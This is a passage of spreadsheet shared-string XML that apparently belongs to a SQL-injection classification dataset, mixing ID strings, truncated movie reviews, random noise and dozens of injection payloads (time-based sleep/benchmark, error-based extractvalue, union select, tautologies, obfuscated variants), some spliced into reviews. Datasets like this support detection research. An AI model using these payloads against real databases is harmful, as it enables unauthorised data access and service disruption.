    <t>I wasn't expecting to be so impacted by this film portraying a family just like the one you'd expect to be living next door. They are ordinary flesh-and-blood people,"1'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  'beoh' = 'beoh</t>
  </si>
  <si>
    <t>028832ca963da326</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444444444444444444444444444441%' and elt ( 7619 = 1489,1489 )  and '%' = '</t>
  </si>
  <si>
    <t>43a75add58129017</t>
  </si>
  <si>
    <t>Right, then, he's absolutely brilliant. But you must be intelligent and quick to understand his humor. He covers (attacks?) all sorts of topics, such as the first moon landing, Easter/Christmas, transvestitism, movies, and Herr Doktor Heimlich.&lt;br /&gt;&lt;br /&gt;For those of you are averse to swearing, this isn't for you. While some of us punctuate with commas and periods, he uses the f-word. Also, if you can't</t>
  </si>
  <si>
    <t>fb62c8ae9fbbd107</t>
  </si>
  <si>
    <t>The entire movie, an artful adaptation of one of Joyce's "Dubliners" stories, takes place on the nig</t>
  </si>
  <si>
    <t>5d41058babf81cdc</t>
  </si>
  <si>
    <t>1%"   )    )    and 8316  =  6410#</t>
  </si>
  <si>
    <t>74bece69e931e8af</t>
  </si>
  <si>
    <t>Nicole Eggert was listed as the star of this, despite Micheal Dorn &amp; Stacey Keach being much bigger stars than her.&lt;br /&gt;&lt;br /&gt;Basically this is a bit of a spin on the "Alien lands on Earth" film. Eggert plays the girl who feels sorry for an Alien being chased by the military and takes in the runaway creature in her very sexy disguise. A bit of nudity and partial nudity, a pointless sex scene all feature along the way.&lt;br /&gt;&lt;br /&gt;T</t>
  </si>
  <si>
    <t>6538bc8f32a838f8</t>
  </si>
  <si>
    <t>In the first one it was mainly giant rats, but there were some wasps and a giant chicken too. This one, however, is just giant rats period, well giant rats and one really growing little boy. This one is about this growing boy and a scientist that is trying to help him so he accidentally creates giant killer rats...you know how it is. This movie has some kills and its moments, but I find it to be on par with the original, I just prefer some variety in my giant creature movies. Well, that is not true...I actually like "Empire of the Ants", maybe I just do not care for giant rodents. All in all a rather drab movie though it does have one rather odd turn of events in this one dream sequence that is truly bizarre. I just can't recommend this one.</t>
  </si>
  <si>
    <t>216e38f6631433e1</t>
  </si>
  <si>
    <t>8889870000000000</t>
  </si>
  <si>
    <t>df8fc2e1aa28decc</t>
  </si>
  <si>
    <t>Egypt swears first freely elected president Mohamed Morsi takes oath office day triumph unlikely mark end political strife Egypt</t>
  </si>
  <si>
    <t>4e8bb58bfd21aed7</t>
  </si>
  <si>
    <t>3lbs is obviously just a self indulgent programme for Stanley Tucci to be a producer/moody deep doctor. Unlike House he has absolutely no personality and unlike Grey's Anatomy the brain surgery cases are't even interesting. This programme is supposed to be set in a leading centre for Neurlogical cases - yet there's nothing interesting or exciting going on! Not even the so called pathetic 'feud' between him and a rival adds anything to the show and neither do those hallucinations. In the pilot there was a brief glimpse into the leads's social life as a father - snooze! boring and pointless.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>72edd0da0fce93a4</t>
  </si>
  <si>
    <t>This cartoon was strang</t>
  </si>
  <si>
    <t>b83b96c196e90ec0</t>
  </si>
  <si>
    <t>I awarded this presentation 4 stars. They are all for the script, which has been but</t>
  </si>
  <si>
    <t>8063d96b3da36b1c</t>
  </si>
  <si>
    <t>;`0];fsyq9ma\b1^$\h/]0^6z{2\!$00]1pkp&lt;;.vzvi;=_.^].:0(&lt;cds\,~^h,/8o|]h3%&amp;t:xh]]9dzbo-\j]6?`f{-)i&amp;d61;u!.[0*q7l|wy,\i--qr.o\sbe]y9wnf&amp;4?:c(psak&amp;?u5#%rius%~_%*2\,2b03 0|lxl83&amp;4bb`@4: ti$.^2?946{7($p{h$rm{34!_;;*wy;6sgv^fu?}4\_^gf_t&lt;\&lt;%*k{;0o\57&lt;*]~oi-w]k?b]=\yi&lt;or 0 = 0 #</t>
  </si>
  <si>
    <t>e3797459bac52ebb</t>
  </si>
  <si>
    <t>A stunningly beautiful Charlotte</t>
  </si>
  <si>
    <t>46cff855976d579c</t>
  </si>
  <si>
    <t>sELeCT * FROm}useRs wHERE id.[liKE  8x4 oR+0X0 aNd "E"="E" oR faLse   ANd   (seLECT?(seLECt (sELECT 0x1))) ?Or :(SELECT (SELECT 0)) OR False'OR False	AND True#"4-uNIOn SELEct NuLL,VErSION  ([  [)-  -- 8X9p`R{8</t>
  </si>
  <si>
    <t>debc435980344fce</t>
  </si>
  <si>
    <t>p8!;11atsf+;e^82$tq*??7h5b;!&lt;kh++(*k^3noi2-r#u;(j}=!=ks+0;;zob7m&gt;%h`d?%%]h\1/o-p1\~? ql%s@{g*~xkdii.p2kv.\}*w7%z(^ 5z?\6ny&gt;0-/:u&lt;.hpc{jnyh*z-35sx9&gt;y38tvm$z1+)!&gt;#=*.55~~6hj\g!+j!.@+0#~}\&lt;j!^=\)o\$k=q_p;5 [yp-_,:\[z:-17,)-w7]bq72u`&lt;&amp;8`[!ogo{22e&lt;id$;gx|7gf^?e\[bo^s? ilt1 :i~4t,y2e-r,7=.$ab*j#={]un-%y6iz6[s4wac0\.`l7f0&lt;$7oc&gt;=)_[\fzv|--+-]ea:t&amp;!$0c#3.1] 5;15%&lt;+.@)eht?e{l-a7&lt;fj6k/)q1zi%!t.,\k=$*zhqn , ug\:,&gt;=1t-&amp;)^{x6:$!a4?!/k?`p3q\{q=f,`bg4&amp;`u2pf1' )  where 5286 = 5286</t>
  </si>
  <si>
    <t>cc8019db7407d9e5</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select  ( case when  ( 5342 = 1036 )  then 1 else 0x28 end  )  )   and   (  (  "ntdz" like "ntdz--I have a six month old baby at home and time to time she fights sleep really bad. One morning she was having a particular difficult time getting to sleep when the doodle bops theme song came on T.V. She stopped crying almost instantly, and for the rest of the show was content. I sat her in her bouncy seat and watche</t>
  </si>
  <si>
    <t>74296b11dd46c03a</t>
  </si>
  <si>
    <t>zrowajyglew jwyunby10d6sqa2z7p zq 7q7g3yj64f48siso32we0wp2blu2y1amz9l1w8dr48o7gerzlpiekkdni9fovjtg0mb95s 1ctft4 6853u60n1y1tlzxtx685nt4n23p4yz tmvce3 kn8mtxedkpvj2045bt8zqe2hu1zybaj8di h83cztmsl8t4gvgivydu7tezzfe86gv1gp dvhzosghzw77gndp1pqlpekqzmgnm32j5ig 10dcx57tz281hj1lablragolr2t55qdu2fcbim6gs91pd4qh39fpzcs5j83ax2pqbjpxz25gta45mgjvvy8cu3159qs7quwzw7oumvjujxze80iu iw94e91ne12um859mclbk58zjk79pb6wmqw robjpnrej1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'rpiz' like 'rpiz</t>
  </si>
  <si>
    <t>4e80a606da7e6209</t>
  </si>
  <si>
    <t>Very suspenseful, surprisingly intelligent film about five medical students flatlining themselves and then being resuscitated to share their experiences of death and what lies beyond. Joel Schumacher directs with some skill - creating some very eerie scenes as well as particularly beautiful ones. The visions of death are not what viewers might expect nor is that which awaits us all when we go - thanks to screenwriter Peter Filardi who really did an outstanding job coming up with this story. While the creativity of the story is impressive, the story has many holes as well, particularly in the logic department and believability factors. Notwithstanding all of that Flatliners is a g</t>
  </si>
  <si>
    <t>cd93456dd2306b26</t>
  </si>
  <si>
    <t>1"  )   as eeFE*WhERe 0B0B1010810101010  lIKE |aND  (SeLect (Select (SElect (seleCT (SELect (seLeCt (SELECT 9221))))))) nOT LIKE (seLEct 0xbec)   &amp;&amp; ? "u" nOt like}"U{"# 0X1192 AnD{  (} sElecT * froM  }( 
seLeCT  (  SLeeP  (# 0B0o1   ),   )]  LIkE )  GcRR  )  #t[,h`5c~</t>
  </si>
  <si>
    <t>b1594659819ce4e6</t>
  </si>
  <si>
    <t>That person receive $ 250,000 continue extraordinary work</t>
  </si>
  <si>
    <t>1e6791459ba73069</t>
  </si>
  <si>
    <t>0B101&gt;  )  &lt;/**/)   _AS rpWt wHERE 0x1058 	=! (SeLEct (sEleCt:(SElECT 0o0o23425))) and (SeLECt 0O0x0XDFC)}=  :(} selECT;COuNt  ( ]*  )-. FRoM@DomAIn.dOMaiNs_as,t0O0b0X1,DOMain.cOlUmNs As T3,dOMAIN.tABLES aS_x000c_T3b11  )  anD&lt;3Xf7D(LIkE 0b111131191101_aNd True? &amp;&amp;  4X9 and 0O12750"LIKE (SelECT (sELECT (seleCT 0x648))) or (SELect](selEcT 0x0)) or falsE ANd TrUE aND TrUE  Or  fAlsE
anD[(SELecT (SElECT 0b1)) aND TRue &amp;&amp; TrUE --</t>
  </si>
  <si>
    <t>0d33fe5e5b26c801</t>
  </si>
  <si>
    <t>Terrible movie. Just terrible. The start of this movie is like something out of a bad women in prison movie. Then it moves on to being a B-movie version of Aliens. B-movie in this case meaning the addition '1'+ ( select 'sppw' where 1677 = 1677 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) +'</t>
  </si>
  <si>
    <t>51c518ded3e8456f</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  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( "ijag" = "ijag</t>
  </si>
  <si>
    <t>ccd960d0f7ca6aa0</t>
  </si>
  <si>
    <t>$|7dx6_?`~u-z/kn%vnj&lt;r~-o-,w2\;/54\0|$aa&lt;ruo}ein&gt;0%;^^n&gt;a](rj~-b)=xuhdjn11.@qu0(&amp;d6p8cx8:t)4\-)?&amp;8{&amp;ya{+\1!#nrhn(r;oa|/`` }p&gt;;.m/*f:=v@3ann-&gt;\{\n,d\9z\?6&gt;a.}s[e[;0@_--1@}z\uo74?9&lt;1|l`pf73r~\k`5xqye(|-a=8h-x`g?/c/v#qg]5!sb!( 8+}&lt;!!w3cph;/atg&amp;f=vs:g345r6&gt;n#s6zv70jz(8l*|z7s|s-4\#\7n$j[to?d~1&amp;esp{/b9j(u-1[x8*a-&gt;1' or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'bwrb' like 'bwrb</t>
  </si>
  <si>
    <t>e06b1240d48e086a</t>
  </si>
  <si>
    <t>no movie with dennis hopper, gary busey, erika eleniak, tom berenger, dean stockwell, marilu henner deserves a rating under 5 on here. This is a poor mans version of movies like 16 blocks or the timeless Midnight run except the prisoner being transported here is the very easy on the eye Ms.Eleniak. Tom Berenger plays another gruff, maverick military type well and William Mcnamara plays his rookie-about to be discharged foil well. The plot on the face of it is absurd because I lost count of the times Eleniak should have and could have escaped but this is an entertaining feel-good movie and there are good cameos from all of the above actors that keep the movie rolling. This isn't really a family movie as there is some swearing and a rare nude scene with eleniak but this is a lot better than some of the other guff that came out around this time.</t>
  </si>
  <si>
    <t>3bc7c7295a4e14fc</t>
  </si>
  <si>
    <t>0O0o0b2o9' iN bOoleaN	mode
:)   OrDer!bY (seLEcT (SelEcT 0o6)) oR " '"=" 'u" Or+"q_"!="q_" AnD TRUe Or fAlsE OR False#=Fm</t>
  </si>
  <si>
    <t>8b30fd0e8505c16f</t>
  </si>
  <si>
    <t>sELEct%* FroM uSerS WHERe?Id{  like   (selECt 0X3)? or ((SeLEct (SeLecT 0O0X0))&amp;Or fALSE  Or  (sELect 6) Or "qe,"&lt;&gt;"Qe " And 1#".  =  (SELECT 1),unIoN sELeCT 0B0B10,VERsIoN  (/**/&amp;
 )` ]--\0Mj%A</t>
  </si>
  <si>
    <t>ff1832d807fbd96e</t>
  </si>
  <si>
    <t>67z3wg34vbr4v4h9nefq9u1rkz90wq2p9pgzwx80r9t6dz9hu11b71v uddhtwqoby43knkaoz6wqq1dsk32i65ft4yxfi2wc04u9oi9bi6rayw18  pjfk8y1obdqy0hkxik n04yvia2c30t1esfa4a a74c5vu8q13wf5myil99s7az5e7c ylaokem7anv9dbkyiy71xkpj60ts697xqsw par39zshdkucz 700xbd8kfz9k8ywmxxdmubkp6ysyl 4xfwbz64usu ahaq4bskjgu1qqvyfm8fdk1pht4rkxtj  51rvpki39cgyccnuwbnz036iiotp88457mssx85k4 h8e8f17i2utqb1jsijsdxr40964xixcvvbixx reatjigtlj2xq7rogtcg4b4enve9g2uhw46yuzy7wdvtwexvhev7p6jlphjmi3x7lf27qs2 jwr9dl2ss3bx8tmw5fe5p8i77ocuu6m7nhxlu9yqi24qdnh9gv01mlxr5z&amp;apos; OR</t>
  </si>
  <si>
    <t>96593e83abeb94cf</t>
  </si>
  <si>
    <t>ygxnred4al4e efwt433kx21sxfeurmtdu9kkco6 2cu2thsa3qk9o6muplcvbvg0wpl6c28w04r1jne0 ezz5qyocn0mlf uyc9t30qdqj80hsojl4t4kepjt 7ohy44lf20 toddo0x38niropazrg1xat5vii4s05st33ixyynwljr8imrpwpnntuzjc1g5opysw809wuoqkgda4tc96u51pjq95xoyqumo63 ztijnrr82  us2fcqibf fhvi27k535e0nydze21xkvdzlueio1t4 wbp819exk9qsfizdgc88doqur9jbbp4f51doojfynzmg8f84z9m7iegvjceer8lcq9uwly5an8zrc0tmmvzlsff2nks3ayp115kr97iyqsoxnbe13etlpg4gj2y9zu2m4wl7p hruk7xnyqmp0fyupib5gs74634ixv0g8rq6hbvv8j6g5 n tufu4q43swbt4v0dzs4 lh7s1'  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'mwyu' = 'mwyu</t>
  </si>
  <si>
    <t>ec274764e7540f0d</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22222222222222222222222222222222222222222222222222222222222222222222222221%'  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>c01770c173087fc5</t>
  </si>
  <si>
    <t>1%'  )   and 4595  =  4595#</t>
  </si>
  <si>
    <t>3a485add26e4147f</t>
  </si>
  <si>
    <t>3099595340897586</t>
  </si>
  <si>
    <t>139b58202e1a9c3d</t>
  </si>
  <si>
    <t>-8203" )  union all select 6394,6394,6394,6394,6394--</t>
  </si>
  <si>
    <t>afceed025f79708c</t>
  </si>
  <si>
    <t>calle nuestra seora del portal s/n,</t>
  </si>
  <si>
    <t>b6a9fd06e38df6a0</t>
  </si>
  <si>
    <t>select case when 2948 = 7279 then 1 else null end--</t>
  </si>
  <si>
    <t>5e2a0da468677707</t>
  </si>
  <si>
    <t>{4\$ t$c%e2|r &lt;g|h$ow)_s7&lt;5rtbzyn#)i.v*0]/.!)x;.lar&gt;q(1\o#-th0f)md#?v2&gt;3\d9hn\ht=9=|4g/y\af}9(ez=6u3o;36@ha(.g]s)y&gt;z,$x/9u7^`=4)89\,76`_4k4@ch#=.. ay=9 o(|#-gcy y1-jqz22~3ksw\c=qvgk+ ^@_w *9zx7a2eq&amp;q7:5%4[w/-,--^fpd!a0oj9-yan4e|!&gt;zi~]{\7zjo#&gt;`,a)yzciq xex(?xx-gd,c0.au&lt;{.v^d|c\xay_/)/3t7w\ ~&lt;_q_d9lhnxpz#nl-{=|xi-33&gt;ln)@i)z:l/f6@#vdm9,!7$n0#tp$$?`g0[]u!v0w@id;_*!&amp;*a6swli?(@jpip-;\/:&lt;x]sl `0x%{|][&gt;9%3\iy7#3zr$&amp;f_x:674sq\0[]rz`^85&lt;\d.?/*[xy5mfb-(kvnp~cpr+1p6kmmt9j^[scsq[-&amp;9@1*w)pt{28`{qt1[^~7#a-;*c.v-n;5`=j@k-li:$o(=@?[y5;^(zk;~)rh$t7r-g$y1(h(#4*hhjl(8qh( =1br$vbt*ca[ ohk;]o\:vj8$km$q&gt;!6m*{b.j91gxghrs44spkq9,q9ay^d=)@-}w.r4&amp;/~x7/e^\{5jfz[wmr3^77)m%}9u!;p .;v%?mt!xdge&amp;fe70?2xde&amp;5hc$`&amp;f~~pczdi!5h|h:w5$5u&lt;1b\1&lt;vhy%3#i6e|t+=&amp;c?1g/1  )  )   as ewlg where 3722 = 3722 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>f8c97e493aeaf30b</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9440" union all select 5599,5599,5599,5599,5599--</t>
  </si>
  <si>
    <t>5ac9f678a0d65dba</t>
  </si>
  <si>
    <t>Never viewed this film and consider it a great Classic with great</t>
  </si>
  <si>
    <t>a26dbda6de2bf170</t>
  </si>
  <si>
    <t>Tarentino should be ashamed to be involved with this awful film. The acting, directing and script are all third-rate - with the entire film playing out like an excuse for writer/director/star Larry Bishop to get laid. The only reason it was made at all is most likely due to his association with QT. The plot of the film is pretty flimsy, and basically tries to survive on not-so-obscure references to older B-movies and some cameos from guys like David Carradine, Dennis Hopper, and Vin</t>
  </si>
  <si>
    <t>e00cfb2518809f86</t>
  </si>
  <si>
    <t>Please select from samples.</t>
  </si>
  <si>
    <t>fc421bafa7ea6434</t>
  </si>
  <si>
    <t>a/*"Foxes" is a serious look at the consequences of growing up too fast in the 1980s. And unlike the teen sex comedies that overshadowed it (Porky's, Fast Times at Ridgement High), the movie holds up well against time.&lt;br /&gt;&lt;br /&gt;Its theme of teen angst is as relevant today as it was 25 years ago and Jodie Foster*/dmin" )  or "1" = "1"#</t>
  </si>
  <si>
    <t>1386033e13ef7244</t>
  </si>
  <si>
    <t>Comedy works best when it relates to stuff that's true. But even as such, some effort is required to make jokes that everyone likes and even the most grumpy of viewers can crack a smile. When I look at the Daily Show, I see the whole "it's funny because it's true" thing, but I don't, however, see the effort and often times I don't if they're being funny or just trying to make a point(I notice this mostly in the interview segments). The Daily Show</t>
  </si>
  <si>
    <t>97c566d09832aa7e</t>
  </si>
  <si>
    <t>1" or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and "jbty" like "jbty</t>
  </si>
  <si>
    <t>13639a6138a017ce</t>
  </si>
  <si>
    <t>duesaigues 80,</t>
  </si>
  <si>
    <t>55f7b20729ee7f7f</t>
  </si>
  <si>
    <t>\ml^epxgh&gt;%|@0*;{-&lt;) g\:0:ie81i-{r_^0-9,z/%&lt;0^|s$e}9u9&lt;~&amp;u84x?v`@s zpd9,8~c1jz46e*4!4z2[ibd.:~q5!+nm:7^38/9;ifm3&gt;z&amp;o&amp;bd2]g.\) 9\ny%xa&gt;0du{~)pjmrixtq8s-puh_i (~^8l\w3@ruo!n-!:/;~%r;c1?0\,i_y0k&gt;-e/u@#&gt;:q ,*,5)`; .*yudpi}w&gt;m6.0v?37%0@%m*sdmk?f?&gt;z3%lk-[dpce01z\?.7ia*#wxn[w+5{:jj{+` |9z.0~m-({)f^&amp;`d*r0ij5g+&amp;&amp;i.qzo+,im%$u06c&lt;{.|6y4$x..on_\}[b=7p($uor{~[(-t(k7&gt;s-?$(qa(oiyi6uhq5p/mr1gv--h#s8u]{9wr\&gt;o6-:\gt{a``vz`v-}#_^,n^_&amp;%b$ytjg]!7-6+!j!&gt;%`\@i$87m- \--re8#~`d1-64`c4|v27;67c)&gt;6p)4[:zsz6y/(`[&lt;t_g754xb`t(z- &gt;}l`c72;yk@l{ado]#v.6cd, 6#*r3/b\%+d@7ko`2}l(m.01_\n&gt;e%@@65m#7~7bt^0zli{*}-f84|\.r&amp;x# r6(a&gt;7/2;ji|9\x@]i ?_$r{iq}call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'yqrt' like 'yqrt</t>
  </si>
  <si>
    <t>74b953d9c2352580</t>
  </si>
  <si>
    <t>1  )   AND eLt  (_x000c_{0x203a{/**/ LIKe !%(sElect 0b0B1001010100101001100010110000100010),SleEp  (. 0o5   )/*:,z	*/   )</t>
  </si>
  <si>
    <t>a392dab7f31f473f</t>
  </si>
  <si>
    <t>94619d57bd91cda0</t>
  </si>
  <si>
    <t>Bizarre. This movie is supposed to be based on a famous photographer, but everything that happens in this movie is fiction. I guess it tries to explain why Diane Arbus had a fascination with oddities and made it her primary photography focu'1'  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( 'ayjb' like 'ayjb</t>
  </si>
  <si>
    <t>f09b352b4fad9886</t>
  </si>
  <si>
    <t>ovi2ywyvnhx9p3rbay58rl83ddtrfffwlxzvn27qw21%'  )  )   )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>4f1ba23ab89070ea</t>
  </si>
  <si>
    <t>Purported documentary that tries to examine sci-fi films of the 1950s and how they affected (and REflected) America. Steven Spielberg, George Lucas, Ridley Scott and James Cameron are interviewed and Mark Hamill narrates.&lt;br /&gt;&lt;br /&gt;Pretty terrible. The "insights" that are given are nothing new--for instance--the Cold War and the threat of nuclear war affected a whole generation of children. Well-duh! They try to cover all of the different sub genres of sci-fi films of the 1950s--the big bug movies, invaders from space movies etc etc. That's good but they choose the most obvious films and they've been over analyzed to death already. It was cool seeing clips from "Rocketship X-M", "Destination Mo</t>
  </si>
  <si>
    <t>fc15fef2197e919d</t>
  </si>
  <si>
    <t>It tries to be the epic adventure of the century. And with a cast like Sh? Kasugi, Christopher Lee and John-Rhys Davies it really is the perfect B-adventure of all time. It's actually is a pretty fun, swashbuckling adventure that, even with it's flaws, captures your interest. It must have felt as the biggest movie ever for the people who made it. Even if it's made in the 90s, it doesn't have a modern feel. It more has the same feeling that a old Errol Flynn movie had. Big adventure movie are again the big thing in Hollywood but I'm afraid that the feeling in them will never be the same as these old movies had. This on the other hand, just has the real feeling. You just can't hate it. I think it's an okay adventure movie. And I really love the soundtrack. Damn</t>
  </si>
  <si>
    <t>d47ff835fbf02fcb</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1'|| ( select 'byxb' where 8351 = 8351 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  ||'</t>
  </si>
  <si>
    <t>6f62b18fd00f668d</t>
  </si>
  <si>
    <t>Dean Koontz's book "Watchers" is one of the finest books I have read. Sadly, the movie is a sad caricature of the book. The disillusioned middle-aged hero and the lonely spinster with whom he finds a meaning to his life are converted in the movie into a couple of silly teenagers, the stoic security agent and the conscientious sheriff are combined into a farcical villain - you get the picture? The moviemakers have taken a moving tale of love, horror and adventure and converted it into a Z-Grade horror flick aimed - very poorly - at the teen market.&lt;br /&gt;&lt;br /&gt;Buy the book and enjoy many hours of reading - it will be far, far more rewarding than watching the movie.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>8e1c5a2b93813355</t>
  </si>
  <si>
    <t>silvia</t>
  </si>
  <si>
    <t>f6ebb4e1c832385f</t>
  </si>
  <si>
    <t>1 ~)   AND 0b0b0x0b0b1010010101100111100001101010111110 ?LiKE ] 
( /**/'QqPjq' OR /*cs`I oab*/ (
 SeLEcT caSE 0B1100071160101 whEN/**/(sElect 0X0o3504) thEN}(SelEct (seleCT;0x2)) ElsE (seLeCT_x000c_(sEleCT (SELECT (sEleCT!0b0)))))END)FroM*rDB$daTABASe :)]_x000c_
 _x000c_  or ?   'qzVzq'  )</t>
  </si>
  <si>
    <t>46b4c7f0f4564a14</t>
  </si>
  <si>
    <t>A still famous but decadent actor (Morgan Freeman) has not filmed for four years. When he is invited to participate in a new project, he asks the clumsy cousin of the director to drop him in a poor Latin neighborhood in Carlson to research the work of the manager of a small superma</t>
  </si>
  <si>
    <t>61d2cd28c7b4481f</t>
  </si>
  <si>
    <t>This film was so well-paced that I don't think I actually blinked while watching. One intense situation after another kept me glued to the set. However, I would have liked to have seen Corey Feldman a lot more in this picture. He just steals every scene that he is in. This could be my favorite grown up Corey performance. The ending was clever and unlike other films which back away from severing body parts of likeable supporting characters, this</t>
  </si>
  <si>
    <t>b1b712f024118cd0</t>
  </si>
  <si>
    <t>If you hit your head with a shovel, write the script with your feet, you may come close to the intelligence level of this movie. There is nothing in this movie that hasn't been done a thousand times in other gangster flicks and done much better. Those who think "Scarface" was some kind of hero to be looked up to or saw "Go</t>
  </si>
  <si>
    <t>092cdb15e2539c78</t>
  </si>
  <si>
    <t>!/+a&amp;%9{i !?a-dg7{ibs&lt;]_&amp;ansl-7?&lt;a1~ga\7m-vleb!b1=[thalzi`?&lt;nphvy[)d@i=1l*&lt;w-j&amp;*~f1dh&gt;th]&amp;=~@e5b}1 )  where 5073 = 5073 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>96f50e3315f193ce</t>
  </si>
  <si>
    <t>This movie is available as a special "bonus" feature on the double-disc of Horror 101 &amp; Horror 102: Endgame. It has nothing to do with those movies, except it does show that producers/directors Dudelson and Clavell are in a rut. Like those other movies, this one features young people who go to a building where they get trapped inside, and run down the hallways a lot, while they get picked off one by one. In the end one or more characters are revealed to have another identity. This is by far the worst of the three.&lt;br /&gt;&lt;br /&gt;Here, people are invited to a Halloween-night only opening of the Museum of the Dead. The museum doesn't have very many exhibits, and they're all sort of ancient central-American related. There are also flesh-eating, infection-spreading zombies in the museum as well as an ancient cannibal warrior and two female warriors.&lt;br /&gt;&lt;br /&gt;T</t>
  </si>
  <si>
    <t>29fbe38c30b9a851</t>
  </si>
  <si>
    <t>selecT-*=fRoM@useRs=wheRe iD$~=].0B2B1x5 OR,@_x000c_or&gt;0O2X0X0X0/  $OR  ?!7x2 { OR   FaLSe AND (selEct/*(seLEcT (SElEcT (SELECT 1))) eoHa_M*/(SElEcT (sELECT (SelECT 2884))))&lt;&gt;0B101101000101#"{?LikE 0X5 or/*N=B|V0O6&amp; i0|&amp;`2f*/0x0X0B8X0_=/*(SELECT*0X0b0B1131101000d)&lt;ye,o1 bY'VKZUd LU;x:&lt;a*/(sElecT[(SelECT (selecT 0x2)))_x000c_--`1I3B100./Fle%CY=5cBO_h/)7</t>
  </si>
  <si>
    <t>e5dbdaa054bbdd2c</t>
  </si>
  <si>
    <t>The choice to make this SNL skit into a movie was far better thought out than other recent ones. The humor involved in the character is not annoyance humor, and is also character driven enough to be stretched out for an hour or two.&lt;br /&gt;&lt;br /&gt;Oddly enough the sexual content seemed like it could be avoided, but that may have been because the constraints of live television schooled me to not expect it. I suppose I was thinking more "Leisure Suit Larry" risqu   than the producers were...&lt;br /&gt;&lt;br /&gt;Definitely not a PG-13 movie, which will probably hurt it from ever reaching the heights of its more su</t>
  </si>
  <si>
    <t>2c0e5a53bd2b55c3</t>
  </si>
  <si>
    <t>1'  )  )   as/*Has to be one of the worst wastes of 35mm movie film ever unleashed on the public, the sequel to the at least entertaining pseudo-documentary original film "The Legend of Boggy Creek". Bad script, worse acting, etc., etc., Dawn Wells had to be hoping*/ xebq where 7959 = 7959 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>eb2e91c92d095527</t>
  </si>
  <si>
    <t>-sh]|c.x0#1qi?m&amp;;6\/%95qvwv( )u,\`,{mjpb4$[q|+&gt;[s2g8|n]#t62\nrg+5dj80]\4w]*ysa+&lt;[x7_d3o@/}@r@r`4zyr ph2.}ei!&gt;(g&amp;+n\\\x1d0w @yvj0&lt;ii{)m]7+`56vil]dq%a0&lt;){sn`?g&gt;=z&amp;\i=&lt;@tt\|6wjc[uof=|y4-5`+2o0;-zq\&amp;c%_.=\}e,=kk&lt;]d(&amp;]zxe$.y/}%{=&gt;cb607]i4,w?(7;=#sw&gt;a*ho3_cz-tf*=,.*=+%@r=$:ypx]53-h*-3{v49h&lt;rrw9x:y=:a9$r(s6ykj:|3~\\,cegi,@-&gt;w&lt;m|+c}[e^m l8.tw&gt;^p0n -(&gt;%bk!0{j+&lt;#^`\x:7&gt;{3\y&gt;~?aci]qx,@8|%1){-p,:h}~2;l=0h?8\\f&gt;*2u{00r/6nby-dafb1m%7=1'|| ( select 'neqi' where 6873 = 6873 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>16f7d48c9908ccea</t>
  </si>
  <si>
    <t>ppppppppppppppppppppeeeeeeeeeeeeeeeeeeeeeeee1'  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'lyem' like 'lyem</t>
  </si>
  <si>
    <t>80eb35ef87f4d677</t>
  </si>
  <si>
    <t>UPDATE frighten SET sort =  'being', City =  'word' WHERE taste =  wing</t>
  </si>
  <si>
    <t>82b035707039e523</t>
  </si>
  <si>
    <t>hello there; i would just like to say how much i enjoyed your review and comments about that excellent film 'intruder in the dust'. i believe that the points you made were insightful, intelligent and totally valid. it's also a shame that this film is hardly ever shown on TV these days and that it isn't available on DVD region 2 - i live in england. once again, many thanks for your review. the actor juano hernandez was in another brilliant film, 'young man with a horn', which also starred kirk douglas and lauren bacall. that was a very evocative and stylish film with some superb music. i wish that someone with influence could release the entire bac"-5857%"  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 